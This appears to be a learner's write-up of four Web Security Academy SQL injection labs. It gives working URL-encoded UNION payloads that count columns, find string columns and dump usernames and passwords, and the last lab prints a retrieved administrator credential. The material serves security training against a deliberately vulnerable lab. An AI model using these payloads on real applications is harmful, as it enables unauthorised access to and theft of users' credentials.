[Web Security Academy] SQL Injection (1)

Lab 1: SQL injection UNION attack, determining the number of columns returned by the query

Intro

This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. The first step of such an attack is to determine the number of columns that are being returned by the query. You will then use this technique in subsequent labs to construct the full attack.

To solve the lab, determine the number of columns returned by the query by performing an SQL injection UNION attack that returns an additional row containing null values.

Solution

1. Recon
   Note that adding ‘ after the category parameter causes server internal error.

2. Solution
   By add ‘UNION SELECT NULL– after the category parameter, a union select function is created. To retrieve the number of columns, current number of NULL is needed. In this lab example, the answer is:
   %27+UNION+SELECT%20NULL,NULL,NULL--

Lab 2: SQL injection UNION attack, determining the number of columns returned by the query

Intro

This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you first need to determine the number of columns returned by the query. You can do this using a technique you learned in a previous lab. The next step is to identify a column that is compatible with string data.

The lab will provide a random value that you need to make appear within the query results. To solve the lab, perform an SQL injection UNION attack that returns an additional row containing the value provided. This technique helps you determine which columns are compatible with string data.

Solution

1. Recon
   The number of columns is the same as the previous lab example.

2. Solution
   By add ‘UNION SELECT NULL– after the category parameter, a union select function is created. To retrieve the datatype, inject payload into the previous NULL. In this lab example, we need a string type so we can replace NULL at each position with “abc”. The answer is:
   %27+UNION+SELECT%20NULL,'abc',NULL--

Lab 3: SQL injection UNION attack, retrieving data from other tables

Intro

This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.

The database contains a different table called users, with columns called username and password.

To solve the lab, perform an SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

Solution

1. Recon
   There are two columns in the DB.

2. Solution
   Since column names and DB names are given in this case, the solution is relatively simple.
   The answer is:
   %27+UNION+SELECT%20username,password%20from%20users--

Lab 4: SQL injection UNION attack, retrieving data from other tables

Intro

This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.

The database contains a different table called users, with columns called username and password.

To solve the lab, perform an SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.
SQL_Injection_Cheatsheet

Solution

1. Recon
   There are two columns in the DB users.

2. Solution
   The solution from the previous example is not working. To handle relatively more complex injection, I use Burp in for this lab.

To check which column contains string:
%27UNION%20select%20NULL,%20%27abc%27%20from%20users--

This means that the second column can be used to display string output from the users DB. Now we can retrieve username and passwords together through:
%27UNION%20select%20NULL,%20username||password%20from%20users--

One output is: administratorjhyvi4dz93yjnxxwjjnt, which is the solution here.